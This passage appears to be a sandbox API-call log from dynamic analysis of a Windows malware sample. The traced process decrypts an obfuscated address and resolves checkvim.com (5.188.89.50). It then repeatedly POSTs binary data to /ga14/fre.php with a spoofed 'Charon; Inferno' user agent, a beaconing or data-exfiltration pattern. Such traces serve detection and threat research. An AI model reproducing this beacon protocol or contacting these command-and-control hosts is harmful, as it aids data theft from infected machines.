returned 0x86ff90 [0281.620] GetProcessHeap () returned 0x840000 [0281.620] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0281.621] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0281.621] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0281.622] GetProcessHeap () returned 0x840000 [0281.622] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0281.622] GetProcessHeap () returned 0x840000 [0281.622] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0281.622] GetProcessHeap () returned 0x840000 [0281.622] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f950 [0281.622] GetProcessHeap () returned 0x840000 [0281.622] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0281.623] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0281.624] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0281.624] GetProcessHeap () returned 0x840000 [0281.624] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0281.624] GetProcessHeap () returned 0x840000 [0281.624] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0281.624] send (s=0x44c, buf=0x873a58*, len=237, flags=0) returned 237 [0281.624] send (s=0x44c, buf=0x87eb58*, len=159, flags=0) returned 159 [0281.624] GetProcessHeap () returned 0x840000 [0281.624] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0281.624] recv (in: s=0x44c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0282.052] GetProcessHeap () returned 0x840000 [0282.052] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0282.052] GetProcessHeap () returned 0x840000 [0282.052] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0282.052] GetProcessHeap () returned 0x840000 [0282.052] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0282.052] GetProcessHeap () returned 0x840000 [0282.052] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0282.052] closesocket (s=0x44c) returned 0 [0282.053] GetProcessHeap () returned 0x840000 [0282.053] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c38 | out: hHeap=0x840000) returned 1 [0282.053] GetProcessHeap () returned 0x840000 [0282.053] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0282.053] GetProcessHeap () returned 0x840000 [0282.053] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0282.053] GetProcessHeap () returned 0x840000 [0282.053] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0282.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x918) returned 0x44c [0282.055] Sleep (dwMilliseconds=0xea60) [0282.057] GetProcessHeap () returned 0x840000 [0282.057] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0282.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.082] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0282.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.094] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0282.104] GetProcessHeap () returned 0x840000 [0282.105] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0282.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.106] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0282.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.107] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0282.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.108] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.108] GetProcessHeap () returned 0x840000 [0282.108] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0282.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.109] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0282.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.113] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0282.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.118] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0282.118] GetProcessHeap () returned 0x840000 [0282.118] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0282.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.123] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.124] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.124] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.125] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.126] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.126] GetProcessHeap () returned 0x840000 [0282.126] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0282.126] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0282.126] GetProcessHeap () returned 0x840000 [0282.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0282.126] GetProcessHeap () returned 0x840000 [0282.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0282.126] GetProcessHeap () returned 0x840000 [0282.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0282.126] GetProcessHeap () returned 0x840000 [0282.126] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0282.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.128] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0282.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.136] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0282.148] GetProcessHeap () returned 0x840000 [0282.148] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0282.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.149] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0282.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.150] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0282.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.152] CryptSetKeyParam (hKey=0x87e730, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.152] GetProcessHeap () returned 0x840000 [0282.152] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0282.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.153] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0282.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.154] CryptDestroyKey (hKey=0x87e730) returned 1 [0282.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.156] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0282.156] GetProcessHeap () returned 0x840000 [0282.156] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0282.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.157] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0282.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.158] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0282.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.159] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0282.159] GetProcessHeap () returned 0x840000 [0282.159] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0282.160] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0282.162] GetProcessHeap () returned 0x840000 [0282.162] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0282.162] socket (af=2, type=1, protocol=6) returned 0x450 [0282.162] connect (s=0x450, name=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0282.228] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0282.228] GetProcessHeap () returned 0x840000 [0282.228] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0282.228] GetProcessHeap () returned 0x840000 [0282.228] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0282.229] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0282.230] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0282.230] GetProcessHeap () returned 0x840000 [0282.230] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0282.230] GetProcessHeap () returned 0x840000 [0282.230] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0282.230] GetProcessHeap () returned 0x840000 [0282.230] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f8c0 [0282.230] GetProcessHeap () returned 0x840000 [0282.230] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0282.231] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0282.231] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0282.231] GetProcessHeap () returned 0x840000 [0282.231] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0282.232] GetProcessHeap () returned 0x840000 [0282.232] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0282.232] send (s=0x450, buf=0x873a58*, len=237, flags=0) returned 237 [0282.232] send (s=0x450, buf=0x87eb58*, len=159, flags=0) returned 159 [0282.232] GetProcessHeap () returned 0x840000 [0282.232] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0282.232] recv (in: s=0x450, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0282.599] GetProcessHeap () returned 0x840000 [0282.599] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0282.600] GetProcessHeap () returned 0x840000 [0282.600] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0282.600] GetProcessHeap () returned 0x840000 [0282.600] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0282.600] GetProcessHeap () returned 0x840000 [0282.600] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0282.600] closesocket (s=0x450) returned 0 [0282.600] GetProcessHeap () returned 0x840000 [0282.600] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0282.600] GetProcessHeap () returned 0x840000 [0282.600] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0282.600] GetProcessHeap () returned 0x840000 [0282.600] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0282.601] GetProcessHeap () returned 0x840000 [0282.601] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0282.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x3f8) returned 0x450 [0282.603] Sleep (dwMilliseconds=0xea60) [0282.604] GetProcessHeap () returned 0x840000 [0282.604] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0282.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.606] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0282.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.612] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0282.621] GetProcessHeap () returned 0x840000 [0282.621] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0282.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.622] CryptImportKey (in: hProv=0x86f710, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0282.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.623] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0282.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.624] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.624] GetProcessHeap () returned 0x840000 [0282.625] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0282.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.626] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0282.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.627] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0282.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.628] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0282.628] GetProcessHeap () returned 0x840000 [0282.628] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0282.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.629] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0282.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.630] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0282.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.631] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0282.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.634] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0282.634] GetProcessHeap () returned 0x840000 [0282.634] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0282.635] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0282.635] GetProcessHeap () returned 0x840000 [0282.635] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0282.635] GetProcessHeap () returned 0x840000 [0282.635] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0282.635] GetProcessHeap () returned 0x840000 [0282.635] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0282.635] GetProcessHeap () returned 0x840000 [0282.635] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0282.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.636] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0282.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.642] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0282.650] GetProcessHeap () returned 0x840000 [0282.650] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0282.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.651] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8b0) returned 1 [0282.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.652] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0282.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.653] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0282.653] GetProcessHeap () returned 0x840000 [0282.653] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0282.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.654] CryptDecrypt (in: hKey=0x87e8b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0282.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.656] CryptDestroyKey (hKey=0x87e8b0) returned 1 [0282.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0282.657] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0282.657] GetProcessHeap () returned 0x840000 [0282.657] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0282.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.658] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0282.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.659] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0282.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0282.661] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0282.661] GetProcessHeap () returned 0x840000 [0282.661] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0282.661] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0282.662] GetProcessHeap () returned 0x840000 [0282.662] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0282.662] socket (af=2, type=1, protocol=6) returned 0x454 [0282.663] connect (s=0x454, name=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0282.735] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0282.735] GetProcessHeap () returned 0x840000 [0282.736] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0282.736] GetProcessHeap () returned 0x840000 [0282.736] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0282.736] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0282.737] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0282.737] GetProcessHeap () returned 0x840000 [0282.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0282.738] GetProcessHeap () returned 0x840000 [0282.738] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0282.738] GetProcessHeap () returned 0x840000 [0282.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f998 [0282.738] GetProcessHeap () returned 0x840000 [0282.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0282.739] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0282.740] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0282.740] GetProcessHeap () returned 0x840000 